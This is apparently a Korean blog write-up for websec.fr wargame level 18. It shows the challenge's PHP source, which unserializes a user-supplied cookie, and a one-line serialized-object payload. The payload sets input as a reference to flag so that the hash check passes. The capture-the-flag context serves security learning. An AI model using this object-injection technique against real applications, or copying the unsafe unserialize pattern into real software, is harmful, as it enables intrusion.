source.php
<?php
include "flag.php";
if (isset ($POST['obj'])) {
setcookie ('obj', $_POST['obj']);
} elseif (!isset ($_COOKIE['obj'])) {
$obj = new stdClass;
$obj->input = 1234;
setcookie ('obj', serialize ($obj));
}
?>
<!DOCTYPE html>
<html>
<head>
<title>#WebSec Level Eighteen</title>
<link rel="stylesheet" href="../static/bootstrap.min.css" />
</head>
<body>
<div id="main">
<div class="container">
<div class="row">
<h1>Level Eighteen <small> - json_decode is for the weak</small></h1>
</div>
<div class="row">
<p class="lead">
Let's pretend that we gave you a serialized object before ; can you give it back please?<br>
This fine level was created by <mark>nurfed</mark>.
You can check the sources <a href="source.php">here</a>.
</p>
</div>
</div>
<div class="container">
<div class="row">
<form class="form-inline" method='post'>
<input name='flag' class='form-control' type='text' placeholder='Guessed flag'>
<input class="form-control btn btn-default" name="submit" value='Go' type='submit'>
</form>
</div>
</div>
<?php if (isset ($_COOKIE['obj'])): ?>
<br>
<div class="container">
<div class="row">
<?php
$obj = $_COOKIE['obj'];
$unserialized_obj = unserialize ($obj);
$unserialized_obj->flag = $flag;
if (hash_equals ($unserialized_obj->input, $unserialized_obj->flag))
echo '<div class="alert alert-success">Here is your flag: <mark>' . $flag . '</mark>.</div>';
else
echo '<div class="alert alert-danger"><code>' . htmlentities($obj) . '</code> is an invalid object, sorry.</div>';
?>
</div>
</div>
<?php endif ?>
</div>
</body>
</html>
unserialize된 객체의 input 필드 값이 unserialize된 후 덮힌 flag 값이랑 일치하면 된다. input에 flag 필드에 대한 레퍼런스변수 세팅한 serialize 데이터 만들어서 보내주면 된다.
payload
O:8:"stdClass":2:{s:4:"flag";s:3:"123";s:5:"input";R:2;}
'Wargame > websec.fr' 카테고리의 다른 글
| websec.fr hard level 07 (0) | 2019.08.23 |
|---|---|
| websec.fr medium level 31 (0) | 2019.08.23 |
| websec.fr medium level 09 (0) | 2019.08.23 |
| websec.fr medium level 05 (0) | 2019.08.23 |
| websec.fr medium level 03 (0) | 2019.08.23 |
JeonYoungSin
메모 기록용 공간